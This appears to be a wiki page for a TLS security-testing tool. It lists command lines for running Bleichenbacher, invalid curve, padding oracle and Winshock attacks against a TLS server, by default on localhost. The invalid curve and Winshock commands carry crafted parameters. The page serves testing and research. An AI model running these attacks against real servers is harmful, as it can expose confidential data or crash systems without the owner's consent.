Skip to content

Attacks

Juraj Somorovsky edited this page Jan 22, 2016 · 26 revisions

This module allows one to test for specific attacks against TLS implementations, or even to execute the whole attacks and extract confidential data.

In the following, we will assume the commands are executed from the Attacks/target folder. The connection is per default established with localhost:4433, unless defined otherwise (using the -connect parameter).

Bleichenbacher Attack

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar bleichenbacher_test 

Invalid Curve Attack

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar elliptic_test -named_curve SECP192R1 -public_point_base_x 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -public_point_base_y 0x74749ac0967a8ff4cc54d93187602dd67eb3d22970aca2ca -premaster_secret 0x9d42769dfdbe113a851bb6b01b1a515d893b5adbc1f61329 -cipher TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

Padding Oracle Attack

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar padding_oracle

Winshock

$ java -jar Attacks-1.0-SNAPSHOT-jar-with-dependencies.jar winshock -cipher TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA -keystore ../../resources/ec256.jks -password password -alias mykey -signature 0x820428032402403284024032 -signature_length 5000
Clone this wiki locally